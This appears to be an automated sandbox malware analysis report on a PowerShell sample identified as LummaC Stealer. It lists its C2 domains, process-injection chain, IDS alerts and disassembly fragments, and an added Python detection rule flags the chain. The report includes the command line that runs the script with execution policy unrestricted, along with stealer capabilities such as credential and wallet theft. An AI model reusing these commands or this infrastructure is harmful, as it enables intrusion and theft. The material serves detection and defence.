
Windows Analysis Report
176.113.115.225.ps1

Overview

General Information

Sample name: 176.113.115.225.ps1
Analysis ID: 1600469
MD5: eaf7ebe973ee32e26027ba74eb211b0c
SHA1: 29f2261e2a37e97045d000cc1bd0fb614cff9f74
SHA256: 97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5
Tags: 176-113-115-225, booking, ps1, spam-ita, user-JAMESWT_MHT

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

  • System is w10x64
  • powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 8040 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
{
  "C2 url": [
    "pleasedcfrown.biz",
    "affordtempyo.biz",
    "mixedrecipew.biz",
    "hoursuhouy.biz",
    "suggestyuoz.biz",
    "lightdeerysua.biz",
    "toppyneedus.biz",
    "impolitewearr.biz",
    "grapeprivatter.cyou"
  ]
}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", ProcessId: 7816, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1", ProcessId: 7816, ProcessName: powershell.exe
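The process tree and the two Sigma matches above describe a single execution chain: powershell.exe started with -ExecutionPolicy unrestricted on a .ps1 in the user's Desktop, which then starts RegSvcs.exe with no arguments as the host for the injected LummaC payload (the signature list records "Creates a process in suspended mode" and "Writes to foreign memory regions" for the same run). The Python below is an added example by the editor, not part of the Joe Sandbox report, showing how that shape can be hunted in process-creation telemetry. The event records are constructed from the report's process tree; the field names, the explorer.exe parent for PID 4056 (the report leaves its parent blank), and the list of .NET utilities other than RegSvcs.exe treated as injection hosts are assumptions.

```python
import re

# Process-creation events constructed from this report's process tree (PIDs, images and
# command lines as shown there). Field names are an assumption; the parent image of
# PID 4056 is not in the report and is assumed to be explorer.exe.
EVENTS = [
    {"pid": 4056, "ppid": 1000, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 7816, "ppid": 4056,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
                r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"'},
    {"pid": 7824, "ppid": 7816, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 8024, "ppid": 7816,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"pid": 8040, "ppid": 7816, "image": r"C:\Windows\system32\wermgr.exe",
     "cmdline": r'"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" '
                r'"1988" "0" "0" "2592" "0" "0" "0" "0" "0"'},
]

# powershell.exe accepts any unambiguous prefix of -ExecutionPolicy (-ex, -exec, -ep, ...),
# so match the prefix rather than the full switch name.
INSECURE_POLICY = re.compile(r"-(?:ex\w*|ep)\s+(?:unrestricted|bypass)\b", re.IGNORECASE)
SCRIPT_ARG = re.compile(r'-f(?:ile)?\s+"?([^"]+?\.ps1)', re.IGNORECASE)

# .NET Framework utilities that do nothing useful when started without arguments and are
# therefore common hosts for injected code. RegSvcs.exe is the one seen in this report;
# the other names are added by the editor as an assumption.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_insecure_powershell(cmdline: str) -> bool:
    """True when the command line switches script signing checks off."""
    return INSECURE_POLICY.search(cmdline) is not None


def is_bare_dotnet_host(event: dict) -> bool:
    """True when a .NET utility is started with no arguments at all: it has no work of its
    own, which is the tell-tale shape of a suspended process used as an injection target."""
    if _basename(event["image"]) not in DOTNET_HOSTS:
        return False
    return event["cmdline"].strip().strip('"').lower() == event["image"].lower()


def find_injection_chains(events: list[dict]) -> list[dict]:
    """powershell.exe (insecure policy, running a .ps1) -> argument-less .NET host."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child["ppid"])
        if parent is None or _basename(parent["image"]) != "powershell.exe":
            continue
        if not (is_insecure_powershell(parent["cmdline"]) and is_bare_dotnet_host(child)):
            continue
        script = SCRIPT_ARG.search(parent["cmdline"])
        hits.append({
            "script": script.group(1) if script else None,
            "parent_pid": parent["pid"],
            "child_pid": child["pid"],
            "host": _basename(child["image"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_injection_chains(EVENTS):
        print(f"[!] {hit['script']} (PID {hit['parent_pid']}) spawned bare "
              f"{hit['host']} (PID {hit['child_pid']})")
```

Run on the constructed events this reports exactly one chain, PID 7816 to PID 8024. conhost.exe and wermgr.exe are children of the same PowerShell process but are not flagged, which is the point of requiring both the parent and child conditions: the execution-policy switch alone is far too common in administrative scripts to alert on by itself.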
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-27T15:58:21.067993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.908893+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.067993+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:20.506711+0100 | 2059421 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:20.519335+0100 | 2059423 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:24.082393+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP


      AV Detection

Source: https://toppyneedus.biz/it | Avira URL Cloud: Label: malware
Source: toppyneedus.biz | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/N | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/apiz | Avira URL Cloud: Label: malware
Source: suggestyuoz.biz | Avira URL Cloud: Label: malware
Source: grapeprivatter.cyou | Avira URL Cloud: Label: malware
Source: pleasedcfrown.biz | Avira URL Cloud: Label: malware
Source: lightdeerysua.biz | Avira URL Cloud: Label: malware
Source: affordtempyo.biz | Avira URL Cloud: Label: malware
Source: hoursuhouy.biz | Avira URL Cloud: Label: malware
Source: impolitewearr.biz | Avira URL Cloud: Label: malware
Source: mixedrecipew.biz | Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/apieB | Avira URL Cloud: Label: malware
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["pleasedcfrown.biz", "affordtempyo.biz", "mixedrecipew.biz", "hoursuhouy.biz", "suggestyuoz.biz", "lightdeerysua.biz", "toppyneedus.biz", "impolitewearr.biz", "grapeprivatter.cyou"]}
Source: 176.113.115.225.ps1 | Virustotal: Detection: 11%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: pleasedcfrown.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: affordtempyo.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: mixedrecipew.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: hoursuhouy.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: suggestyuoz.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: lightdeerysua.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: toppyneedus.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: impolitewearr.biz
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack | String decryptor: grapeprivatter.cyou
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0041E081 CryptUnprotectData | 3_2_0041E081
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49791 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.29.142:443 -> 192.168.2.7:49826 version: TLS 1.2
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1915035763.00000219C78C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then lea ecx, dword ptr [edx+014B0E26h] | 3_2_004100EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov esi, ecx | 3_2_0040CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+6089C535h] | 3_2_00445B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], C8B478E8h | 3_2_0042CBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000094h] | 3_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx+7FC08F55h] | 3_2_0043EC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov eax, edx | 3_2_00429F42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_0040CF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], dl | 3_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000001E3h] | 3_2_00412762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [edx], ax | 3_2_0040F717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+69FE9BD2h] | 3_2_00443F26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], CD5A394Bh | 3_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], CD5A394Bh | 3_2_004467E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [eax+edx*8], E40A7173h | 3_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_00419000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h] | 3_2_0042D020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+310813C5h] | 3_2_0042E03E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_004450C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_004450D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_004450DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+00000086h] | 3_2_0042D14A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] | 3_2_00427150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], DC6B6BB0h | 3_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [ecx+esi*8], DC6B6BB0h | 3_2_0041C955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_00430930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [edx+esi*8], C8B478E8h | 3_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h | 3_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then push eax | 3_2_0043F9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov eax, dword ptr [00457FFCh] | 3_2_004441FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0042FA03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h | 3_2_00442200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movsx ebp, byte ptr [esi+ecx] | 3_2_00444A31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0040DAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AAC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0043428A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edx], al | 3_2_00420289
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AA89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 3_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 3_2_0040A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 3_2_0040E360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], bl | 3_2_00433B7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_00445310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_004343D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 3_2_00431BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_004343EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_00434393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h] | 3_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [esp+02h], 02CE9287h | 3_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-41704336h] | 3_2_004433A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_004453B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+00000218h] | 3_2_00411BBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 3_2_00419C65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+4Ch] | 3_2_00426C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_0040DD4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 3_2_0040EDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+esi] | 3_2_004105D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0042F59D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_0043BDB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] | 3_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+02h] | 3_2_00443634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+0Ah] | 3_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_00420EC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ebx-4078D9EFh] | 3_2_004206EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp word ptr [ecx+edi+02h], 0000h | 3_2_0042EE95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movsx eax, byte ptr [esi+ecx] | 3_2_00418F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_00421748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [ecx], bx | 3_2_00421748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh | 3_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [esp+04h], eax | 3_2_0041BF76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h | 3_2_00442710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_00421735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov word ptr [ecx], bx | 3_2_00421735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then push esi | 3_2_00425FF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov edx, ecx | 3_2_00444F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then movzx eax, byte ptr [esi+ecx-7E37731Ah] | 3_2_0040EF95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov eax, ecx | 3_2_0041D797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 3_2_0041D797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov ecx, eax | 3_2_0041FFA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp ecx | 3_2_00444FB0

      Networking

Source: Network traffic | Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.7:49751 -> 104.21.29.142:443
